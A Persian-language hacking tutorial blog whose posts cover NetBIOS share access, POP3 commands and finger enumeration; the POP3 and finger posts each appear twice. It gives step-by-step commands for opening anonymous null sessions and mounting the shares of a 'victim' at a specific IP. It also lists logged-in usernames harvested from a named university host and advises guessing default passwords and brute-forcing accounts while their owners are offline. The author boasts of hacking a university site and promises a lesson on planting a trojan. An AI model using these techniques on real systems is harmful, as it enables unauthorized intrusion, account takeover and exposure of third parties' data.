الف) مواجه با پیغام Host not found بشم. این یعنی اینکه نمیتونه لیست منابع را از اون کامپیوتر بگیره (یعنی NetBIOS غیر فعاله). یعنی اگرچه پورت ۱۳۹ بازه ولی قابل استفاده نیست.
ب) ارتباط برقرار بشه و لیست منابع اشتراکی لیست بشه:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
۳- در این نتایج چیزی که به درد میخوره، سطری است که <20> دارد. اگه <20> نباشد، یعنی نمیتونین از اشتراک گذاری فایل استفاده کنید ( به عبارت ساده تر بیخیال شو این کامپیوتر رو ! ). در این مثال ما این سطر را داشتیم پس ادامه میدهیم. حالا مینویسم:
net view \\217.218.84.29
حالا اگه گفتین چی میشه؟ درسته! دو حالت ممکنه اتفاق بیوفته:
الف) پیغام بیاد
System error 5 has occurred.
Access is denied.
این یعنی نمیتونین ادامه بدین. به عبارت دیگه ایست! ولی یه کاری میتونید بکنید و اون اینه که یه null session برقرار کنید با اون کامپیوتر. این حالت در مورد ویندوزهای سری NT جواب میده. مینویسید:
net use \\217.218.84.29\IPC$ "" /user:""
حالا چرا میگن null session ؟ دلیلش اینه که یک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه این دستور جواب داد میتونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:
Shared resources at \\217.218.84.29
Share name Type Used as Comment
------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.
عالیه. دقت کنید که در این کامپیوتر یک فایل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تای باقی برای پرینتر است). حالا که رسیدم به این اسم دیگه آخرین دستور را مینویسم.
۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بدیم. برای اینکار باید یک درایو انتخاب کنید. حتما میدونید که درایو چیه. وقتی شما My Computer را دابل کلیک کرده و باز میکنید، یک سری آیکون میبینید که هر کدام اسمی دارند. مثلا :A برای فلاپی و و و تا میرسید به cdrom که آخرین حرف را دارد. مثلا فرض کنید که :K باشه. حالا باید اسم درایو رو برای اشتراک گذاشتن انتخاب کنید. برای اینکار حرف بعدی در زبان انگلیسی رو به کار ببرید. چون در کامپیوتر من :K آخرین بود، من حرف بعدی یعنی :L را انتخاب میکنم و دستور زیر را مینویسم:
net use L: \\217.218.84.29\SharedDocs
به اسم درایو، ip و نام مربوطه که ShareDocs دقت کنید. چون من اصطلاحا به صورت null session دارم ارتباط میگیرم، ممکنه کار نکنه ولی اگه درست کار کنه جواب میشنوم:
The command completed successfully.
معرکه است!!! حالا My Computer رو باز کنید و ببینید که درایو جدید به لیست درایوها اضافه شده که میتونین مثل درایوهای معمولی با اون کار کنید و فایل کپی کنید و ...
۵- وقتی کار تموم شد میتونید درایو رو حذف کنید. برای اینکار میتونین روی درایو رایتکلیک کنید و Disconnect را انتخاب کنید. و یا اینکه از دستور
net use /delete L:
استفاده کنید.
◊ نکته نکته نکته
۱- یه روش جالب به جای مرحله ۴ در بالا اینه که مثلا در مرورگر یا در run بنویسید 217.218.84.29\\ که ip دارای اشتراک است و یا اینکه تایپ کنید SharedDocsت\217.218.84.29\\ که اصولا باید جواب بده ( ولی من خودم تست نکردم اینو ).
۲- من دارم به صورت استاندارد کار میکنم. بعدا خواهم گفت که چطوری میتونیم وقتی تو بعضی از مراحل متوقف میشیم، اونو دور بزنیم.
۳- NetBIOS فقط برای کلاینتها نیست. من خودم یکبار سایت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه دارید یک کلاینت رو هک میکنید، باید سریع عمل کنید تا قبل از اینکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روشهای دیگری هم برای کار با NetBIOS هست که یکی از اون روشها استفاده از یک سری نرمافزارهای خاص است که تو درس بعدی توضیح میدم و نیز یک روش دیگه اعمال تغییرات در فایلهای HOST و LMHOST و استفاده از find در سیستمعامل ویندوز است. ولی چون این روش دنگ و فنگش زیاده، جالب نیست.
۶- برای اینکه بتونیم با NetBIOS کار کنیم، علاوه بر اینکه در کامپیوتر طرف مقابل باید فعال باشه، روی کامپیوتر خودمون هم فعال باشه. چون در حالت پیشفرض در کامپیوتر فعال است، معمولا مشکلی نیست.
◊ درس بعدی
درس بعدی هم در مورد همین NetBIOS است:
۱- چگونه از این امکان share یا به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم.
۲- چگونه NetBIOS را فعال و غیر فعال کنیم.
۳- از چه ابزارهای دیگهای میتونیم استفاده کنیم.
کوچیک ::: یکشنبه 86/7/22::: ساعت 3:0 صبح
نظرات دیگران: نظر
- خلاصه درس: در این درس با پورت ۱۱۰ (POP3) آشنا میشویم.
◊ خلاصه پروتکلهای مرتبط با E-mail
۱- SMTP :
قبلا با این پورت آشنا شدیم که روی پورت ۲۵ اجرا میشد. ما از این پروتکل برای ارسال E-mail استفاده کردیم. این پروتکل امروزه دیگه برای خوندن E-mail استفاده نمیشه.
۲- POP3 :
بحث امروز ماست. این پروتکل را روی پورت ۱۱۰ بحث میکنیم و از آن برای خواندن E-mail های رسیده استفاده میکنیم.
۳- IMAP :
این پروتکل به عنوان جایگزینی برای پروتکل POP3 بهکار میره. از نظر ساختاری کمی با پروتکل POP3 متفاوت است ولی کارش همان است و برای خواندن E-mail های رسیده به کار میرود.
+ Web-based Email: یک روش دیگه برای دسترسی به E-mail وجود دارد و آن استفاده از امکانات وب برای خواندن و فرستادن E-mail است. وقتی شما از خود سایت yahoo یا hotmail برای کار با E-mail استفاده میکنید، در واقع همین روش را به کار میبرید. نکته قابل توجه آن است که این روش کندتر از استفاده مستقیم از پروتکلهاست.
◊ پورت ۱۱۰ چیست؟
پورت ۱۱۰ برای پروتکل POP3 استفاده میشود. عبارت POP3 مخفف Post Office Protocol Version 3 است که این پروتکل برای خواندن E-mail استفاده میشود. برای کار با این پروتکل باید آدرس POP Server مربوط به E-mail خود را بدانید. برای اینکار میتوان از nslookup استفاده کرد و سطری که عبارت MX دارد را خواند (قبلا چگونگی کار را گفتم و الان دیگه توضیح نمیدم). دقت کنید که در مورد سایتهای کوچک، آدرس POP Server همان آدرس SMTP Server است ولی در سایتهای بزرگ (مثل یاهو ) سرورهای مربوطه جداست ( یعنی دو اسم مختلف دارد ). در مورد سایت یاهو POP Server در آدرس pop.mail.yahoo.com قرار دارد. ( من جدیدا این سرور رو تست نکردم، خودتون تست کنید و مطمئن بشید ). من امروز میخوام از E-mail های سایت noavar.com استفاده کنم که هم خیلی عالیه و هم ایرانیه! POP Server این سایت در آدرس mail.noavar.com قرار دارد.
◊ با پورت ۱۱۰ صحبت کنیم
فرض کنید که من در سرور mail.noavar.com یک اکانت به اسم araztest و پسورد mypass دارم. (شما هم اگه میخواهید تست کنید، یک اکانت برای خودتون در این سایت باز کنید). حالا میخوام با پورت ۱۱۰ صحبت کنم، بنابراین از یکی از دو دستور زیر استفاده میکنم:
telnet mail.noavar.com 110
nc -v mail.noavar.com 110
و جواب میشنوم:
+OK POP3 server www.noavar.com ready
دقت کنید که اگه از تلنت استفاده کنید،چیزهایی که شما تایپ میکنید، دیده نمیشود و نمیتونید از دکمه Backspace استفاده کنید. حالا میخوام بگم که اسم اکانت من araztest است، پس مینویسم:
user araztest
و جواب میشنوم:
+OK Please enter password for araztest
حالا میخوام پسوردم رو بگم که اجازه صادر بشه! مینویسم:
pass mypass
و جواب میشنوم:
+OK password for user araztest Accepted
حالا میخوام بدونم که جمعا چندتا mail رسیده است و حجم کل چقدر است. مینویسم:
stat
و جواب میشنوم:
+OK 2 25924
یعنی برای من ۲ تا پیغام رسیده و حجم کل پیامهای رسیده، ۲۵۹۲۴ بایت است. حالا میخوام لیست پیامها رو داشته باشم، مینویسم:
list
و جواب میشنوم:
+OK
1 70
2 24923
.
این یعنی پیغام شماره یک (پیغام جدیدتر) حجم ۷۰ بایت دارد و پیغام شماره دو حجم ۲۴۹۲۳ بایت دارد. حالا میخوام پیغام شماره ۱ را بخونم. مینویسم:
retr 1
و جواب میشنوم:
+OK 70 octets
Message-ID: <875808060@www.noavar.com>
From: "ali"
X-Mailer: Noavar
To: araztest@noavar.com
MIME-Version: 1.0
Subject: salam
Date: Thu, 13 Feb 2003 20:05:56
salam, chetori?
.
حالا میخواهم این پیغام ( شماره یک ) رو پاک کنم، مینویسم:
dele 1
و جواب میشنوم:
+OK Message 1 Marked for removal
[ دقت کنید که این پیغام هنوز پاک نشده است و فقط علامت خورده که موقع خروج، پاک بشه. حالا ممکنه چندتا پیغام را مارک کنید که حذف بشه ولی بعد بیخیال! میشین. برای اینکه این علامتها را حذف کنید که موقع خروج دیگه پاک نشوند، میتونید بنویسید:
rset
و جواب میشنوم:
+OK 1 70
]
حالا اگه بخواهم خارج بشم (و علامتخوردهها پاک بشن)، مینویسم:
quit
و جواب میشنوم:
+OK www.noavar.com signing off
والسلام ...
◊ خلاصه پروتکلهای مرتبط با E-mail
۱- SMTP :
قبلا با این پورت آشنا شدیم که روی پورت ۲۵ اجرا میشد. ما از این پروتکل برای ارسال E-mail استفاده کردیم. این پروتکل امروزه دیگه برای خوندن E-mail استفاده نمیشه.
۲- POP3 :
بحث امروز ماست. این پروتکل را روی پورت ۱۱۰ بحث میکنیم و از آن برای خواندن E-mail های رسیده استفاده میکنیم.
۳- IMAP :
این پروتکل به عنوان جایگزینی برای پروتکل POP3 بهکار میره. از نظر ساختاری کمی با پروتکل POP3 متفاوت است ولی کارش همان است و برای خواندن E-mail های رسیده به کار میرود.
+ Web-based Email: یک روش دیگه برای دسترسی به E-mail وجود دارد و آن استفاده از امکانات وب برای خواندن و فرستادن E-mail است. وقتی شما از خود سایت yahoo یا hotmail برای کار با E-mail استفاده میکنید، در واقع همین روش را به کار میبرید. نکته قابل توجه آن است که این روش کندتر از استفاده مستقیم از پروتکلهاست.
◊ پورت ۱۱۰ چیست؟
پورت ۱۱۰ برای پروتکل POP3 استفاده میشود. عبارت POP3 مخفف Post Office Protocol Version 3 است که این پروتکل برای خواندن E-mail استفاده میشود. برای کار با این پروتکل باید آدرس POP Server مربوط به E-mail خود را بدانید. برای اینکار میتوان از nslookup استفاده کرد و سطری که عبارت MX دارد را خواند (قبلا چگونگی کار را گفتم و الان دیگه توضیح نمیدم). دقت کنید که در مورد سایتهای کوچک، آدرس POP Server همان آدرس SMTP Server است ولی در سایتهای بزرگ (مثل یاهو ) سرورهای مربوطه جداست ( یعنی دو اسم مختلف دارد ). در مورد سایت یاهو POP Server در آدرس pop.mail.yahoo.com قرار دارد. ( من جدیدا این سرور رو تست نکردم، خودتون تست کنید و مطمئن بشید ). من امروز میخوام از E-mail های سایت noavar.com استفاده کنم که هم خیلی عالیه و هم ایرانیه! POP Server این سایت در آدرس mail.noavar.com قرار دارد.
◊ با پورت ۱۱۰ صحبت کنیم
فرض کنید که من در سرور mail.noavar.com یک اکانت به اسم araztest و پسورد mypass دارم. (شما هم اگه میخواهید تست کنید، یک اکانت برای خودتون در این سایت باز کنید). حالا میخوام با پورت ۱۱۰ صحبت کنم، بنابراین از یکی از دو دستور زیر استفاده میکنم:
telnet mail.noavar.com 110
nc -v mail.noavar.com 110
و جواب میشنوم:
+OK POP3 server www.noavar.com ready
دقت کنید که اگه از تلنت استفاده کنید،چیزهایی که شما تایپ میکنید، دیده نمیشود و نمیتونید از دکمه Backspace استفاده کنید. حالا میخوام بگم که اسم اکانت من araztest است، پس مینویسم:
user araztest
و جواب میشنوم:
+OK Please enter password for araztest
حالا میخوام پسوردم رو بگم که اجازه صادر بشه! مینویسم:
pass mypass
و جواب میشنوم:
+OK password for user araztest Accepted
حالا میخوام بدونم که جمعا چندتا mail رسیده است و حجم کل چقدر است. مینویسم:
stat
و جواب میشنوم:
+OK 2 25924
یعنی برای من ۲ تا پیغام رسیده و حجم کل پیامهای رسیده، ۲۵۹۲۴ بایت است. حالا میخوام لیست پیامها رو داشته باشم، مینویسم:
list
و جواب میشنوم:
+OK
1 70
2 24923
.
این یعنی پیغام شماره یک (پیغام جدیدتر) حجم ۷۰ بایت دارد و پیغام شماره دو حجم ۲۴۹۲۳ بایت دارد. حالا میخوام پیغام شماره ۱ را بخونم. مینویسم:
retr 1
و جواب میشنوم:
+OK 70 octets
Message-ID: <875808060@www.noavar.com>
From: "ali"
X-Mailer: Noavar
To: araztest@noavar.com
MIME-Version: 1.0
Subject: salam
Date: Thu, 13 Feb 2003 20:05:56
salam, chetori?
.
حالا میخواهم این پیغام ( شماره یک ) رو پاک کنم، مینویسم:
dele 1
و جواب میشنوم:
+OK Message 1 Marked for removal
[ دقت کنید که این پیغام هنوز پاک نشده است و فقط علامت خورده که موقع خروج، پاک بشه. حالا ممکنه چندتا پیغام را مارک کنید که حذف بشه ولی بعد بیخیال! میشین. برای اینکه این علامتها را حذف کنید که موقع خروج دیگه پاک نشوند، میتونید بنویسید:
rset
و جواب میشنوم:
+OK 1 70
]
حالا اگه بخواهم خارج بشم (و علامتخوردهها پاک بشن)، مینویسم:
quit
و جواب میشنوم:
+OK www.noavar.com signing off
والسلام ...
کوچیک ::: شنبه 86/7/21::: ساعت 3:0 صبح
نظرات دیگران: نظر
- خلاصه درس: در این درس با پورت ۷۹ (finger) آشنا میشویم.
◊ پورت ۷۹ چیست؟
پورت ۷۹ را پورت finger میگویند. کاربرد این پورت به اوایل ایجاد اینترنت برمیگرده و کاربردش مخصوص سیستمعامل یونیکس بودهاست (الان هم تقریبا فقط در خانواده سیستمهای یونیکس این پورت قابل استفاده است).
وقتی این پورت روی سیستمعامل یونیکس باز باشه، میشه با یک request ساده فهمید که از بین کسانی که در آن سیستم account دارند، کدامها on هستند (یعنی کدامها به سیستم login شدهاند). برنامهای که پورت ۷۹ رو در یک سیستم باز میکنه، finger server میگن و چون مختص سیستمعامل یونیکس است، میتونین از عبارت Finger Deamon استفاده کنین. حالا که پورت ۷۹ روی سیستم باز شد، شما میتونین با اون ارتباط برقرار کنین.
◊ با پورت ۷۹ صحبت کنیم
همانطور که میدانید، برای صحبت کردن با پورتها از دو برنامه telnet و nc میشه استفاده کرد. در مورد پورت ۷۹ یه نرمافزار دیگر به نام finger در تمام سیستمعاملهای یونیکس و برخی سیستمعاملهای ویندوز وجود دارد که علاوه بر دو برنامه قبلی، اونم میشه به کار برد.
فرض کنید که میخوام با پورت ۷۹ در کامپیوتری به اسم router2.iums.ac.ir ارتباط برقرا کنم. برای این کار یکی از سه دستور زیر را استفاده میکنم:
telnet router2.iums.ac.ir 79
nc -v router2.iums.ac.ir 79
finger .@router2.iums.ac.ir
دقت کنید که در دو دستور اول شماره پورت مشخص شده ولی دستور آخری نه، چون دستور finger فقط برای همینکار استفاده میشه و نمیتوان باهاش با پورت دیگهای ارتباط برقرار کرد. ضمنا به ساختار دستور آخر توجه کنید. بعد از اجرای دستور، جواب میشنوم:
Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address
نکته مهم این است که اطلاعاتی که به کمک پورت ۷۹ به دست میآد، خیلی بستگی به سروری داره که این اطلاعات رو میفرسته. بعضی از سیستمها علاوه بر نام افراد (username) که در این مثال دیده میشه، نام و نام خانوادگی افراد، ساعت و محل login کردن و ... را نمایش میدهند. اما چیزی که همیشه وجود دارد و مشترک است، username هاست که از نقطه نظر یک هکر بسیار ارزشمند است. در این مثال ما اکانتهایی به اسم najahan ،whgh و ... در این سرور وجود دارد و افراد مربوطه در حال حاضر login کردهاند. اگر اکانتی موجود باشد ولی فرد مورد نظر در حال حاضر از آن اکانت وارد نشده باشد، نمایش داده نمیشود. این لیست فقط برای اکانتهای فعال است. پس نتایجی که شما در ارتباط با این سرور کسب میکنید، با نتایجی که من نوشتم متفاوت خواهد بود.
◊ این اطلاعات به چه دردی میخورد؟
اول اینو بگم که finger کردن، جزئی از مراحل Enumeration است (البته در حالت کاربرد legal یا قانونی). منظور از عبارت Enumeration یا به طور خلاصه Enum، پیدا کردن لیست کاربران است.
+ فرض کنید میخواهید یک لیست از پسوردها را تست کنید تا اینکه یکی شانسی درست در بیاد (درست مثل دزدها که یه سری کلید را تست میکنن که یکی به قفل بخوره و باز کنه!) حالا سوال اینه که این پسوردها رو برای چه username ی تست میکنید؟ جواب، username هایی است که با Enumeration به دست اومده است. پس اول با Enumeration یه لیست پیدا میکنید و بعد تعداد زیادی پسورد رو روش تست میکنید (روش این کارو بعدا میگم).
+ کاربرد بعدی finger در رابطه با یک سری اکانتهای خاص است. من همیشه وقتی به یک اکانت به اسم guest برخورد میکنم، همیشه پسوردهای guest یا libguest یا myguest و ... رو تست میکنم که گاهی جواب میده. همینطور در مورد اکانتی به اسم demo پسورد demo را تست میکنم و ... معمولا موسسات بزرگ پر است از این username های عمومی که حدس زدن پسورد مربوطه کار مشکلی نیست.
+ گفتم که بعضی سرورهای finger نام و نامخانوادگی افراد را هم برایمان میفرستند. چون بعضی از افراد متاسفانه یا خوشبختانه از این اطلاعات برای پسوردشون استفاده میکنند، میتونه مفید باشه.
+ یک کاربرد دیگه و البته بسیار مهم موقعی است که مثلا میخواهید یک سری پسورد رو روی یک اکانت خاص تست کنید. من همیشه اول یک finger میکنم که مطمئن بشم که فرد در حال حاضر login نکرده باشد و بعد این کار رو شروع میکنم ( یعنی انقدر صبر میکنم که دیگه آن اسم خاص در finger نمایش داده نشه یعنی طرف مقابل logout کرده باشد!)
+ بازم یه کاربردهای مهم دیگه هست که الان بهتون نمیگم تا تو خماریش بمونین ! شوخی کردم، وقتی بحث پورتها تموم شد و رسیدیم به کاربردهای غیر معمول این پورتها، براتون حتما میگم.
◊ پورت ۷۹ چیست؟
پورت ۷۹ را پورت finger میگویند. کاربرد این پورت به اوایل ایجاد اینترنت برمیگرده و کاربردش مخصوص سیستمعامل یونیکس بودهاست (الان هم تقریبا فقط در خانواده سیستمهای یونیکس این پورت قابل استفاده است).
وقتی این پورت روی سیستمعامل یونیکس باز باشه، میشه با یک request ساده فهمید که از بین کسانی که در آن سیستم account دارند، کدامها on هستند (یعنی کدامها به سیستم login شدهاند). برنامهای که پورت ۷۹ رو در یک سیستم باز میکنه، finger server میگن و چون مختص سیستمعامل یونیکس است، میتونین از عبارت Finger Deamon استفاده کنین. حالا که پورت ۷۹ روی سیستم باز شد، شما میتونین با اون ارتباط برقرار کنین.
◊ با پورت ۷۹ صحبت کنیم
همانطور که میدانید، برای صحبت کردن با پورتها از دو برنامه telnet و nc میشه استفاده کرد. در مورد پورت ۷۹ یه نرمافزار دیگر به نام finger در تمام سیستمعاملهای یونیکس و برخی سیستمعاملهای ویندوز وجود دارد که علاوه بر دو برنامه قبلی، اونم میشه به کار برد.
فرض کنید که میخوام با پورت ۷۹ در کامپیوتری به اسم router2.iums.ac.ir ارتباط برقرا کنم. برای این کار یکی از سه دستور زیر را استفاده میکنم:
telnet router2.iums.ac.ir 79
nc -v router2.iums.ac.ir 79
finger .@router2.iums.ac.ir
دقت کنید که در دو دستور اول شماره پورت مشخص شده ولی دستور آخری نه، چون دستور finger فقط برای همینکار استفاده میشه و نمیتوان باهاش با پورت دیگهای ارتباط برقرار کرد. ضمنا به ساختار دستور آخر توجه کنید. بعد از اجرای دستور، جواب میشنوم:
Line User Host(s) Idle Location
33 tty 33 whgh Async interface 0
34 tty 34 najahan Async interface 0
35 tty 35 sadf Async interface 0
36 tty 36 abokho Async interface 0
38 tty 38 whgh Async interface 0
39 tty 39 bzamani Async interface 0
40 tty 40 saeedmah Async interface 0
41 tty 41 mfaizi Async interface 0
42 tty 42 gourabi Async interface 0
43 tty 43 farhadz Async interface 0
44 tty 44 arbks Async interface 0
45 tty 45 mhalavi Async interface 0
46 tty 46 farhood Async interface 0
47 tty 47 staavoni Async interface 0
48 tty 48 whgh Async interface 0
* 66 vty 0 idle 0 217.218.84.58
Interface User Mode Idle Peer Address
نکته مهم این است که اطلاعاتی که به کمک پورت ۷۹ به دست میآد، خیلی بستگی به سروری داره که این اطلاعات رو میفرسته. بعضی از سیستمها علاوه بر نام افراد (username) که در این مثال دیده میشه، نام و نام خانوادگی افراد، ساعت و محل login کردن و ... را نمایش میدهند. اما چیزی که همیشه وجود دارد و مشترک است، username هاست که از نقطه نظر یک هکر بسیار ارزشمند است. در این مثال ما اکانتهایی به اسم najahan ،whgh و ... در این سرور وجود دارد و افراد مربوطه در حال حاضر login کردهاند. اگر اکانتی موجود باشد ولی فرد مورد نظر در حال حاضر از آن اکانت وارد نشده باشد، نمایش داده نمیشود. این لیست فقط برای اکانتهای فعال است. پس نتایجی که شما در ارتباط با این سرور کسب میکنید، با نتایجی که من نوشتم متفاوت خواهد بود.
◊ این اطلاعات به چه دردی میخورد؟
اول اینو بگم که finger کردن، جزئی از مراحل Enumeration است (البته در حالت کاربرد legal یا قانونی). منظور از عبارت Enumeration یا به طور خلاصه Enum، پیدا کردن لیست کاربران است.
+ فرض کنید میخواهید یک لیست از پسوردها را تست کنید تا اینکه یکی شانسی درست در بیاد (درست مثل دزدها که یه سری کلید را تست میکنن که یکی به قفل بخوره و باز کنه!) حالا سوال اینه که این پسوردها رو برای چه username ی تست میکنید؟ جواب، username هایی است که با Enumeration به دست اومده است. پس اول با Enumeration یه لیست پیدا میکنید و بعد تعداد زیادی پسورد رو روش تست میکنید (روش این کارو بعدا میگم).
+ کاربرد بعدی finger در رابطه با یک سری اکانتهای خاص است. من همیشه وقتی به یک اکانت به اسم guest برخورد میکنم، همیشه پسوردهای guest یا libguest یا myguest و ... رو تست میکنم که گاهی جواب میده. همینطور در مورد اکانتی به اسم demo پسورد demo را تست میکنم و ... معمولا موسسات بزرگ پر است از این username های عمومی که حدس زدن پسورد مربوطه کار مشکلی نیست.
+ گفتم که بعضی سرورهای finger نام و نامخانوادگی افراد را هم برایمان میفرستند. چون بعضی از افراد متاسفانه یا خوشبختانه از این اطلاعات برای پسوردشون استفاده میکنند، میتونه مفید باشه.
+ یک کاربرد دیگه و البته بسیار مهم موقعی است که مثلا میخواهید یک سری پسورد رو روی یک اکانت خاص تست کنید. من همیشه اول یک finger میکنم که مطمئن بشم که فرد در حال حاضر login نکرده باشد و بعد این کار رو شروع میکنم ( یعنی انقدر صبر میکنم که دیگه آن اسم خاص در finger نمایش داده نشه یعنی طرف مقابل logout کرده باشد!)
+ بازم یه کاربردهای مهم دیگه هست که الان بهتون نمیگم تا تو خماریش بمونین ! شوخی کردم، وقتی بحث پورتها تموم شد و رسیدیم به کاربردهای غیر معمول این پورتها، براتون حتما میگم.
کوچیک ::: جمعه 86/7/20::: ساعت 3:0 صبح
نظرات دیگران: نظر
لیست کل یادداشت های این وبلاگ
>> بازدیدهای وبلاگ <<
بازدید امروز: 6
بازدید دیروز: 18
کل بازدید :31849
بازدید دیروز: 18
کل بازدید :31849
>>اوقات شرعی <<
>> درباره خودم <<
>>لوگوی وبلاگ من<<
>>آرشیو شده ها<<
>>جستجو در وبلاگ<<
جستجو:
>>اشتراک در خبرنامه<<
>>تبلیغات<<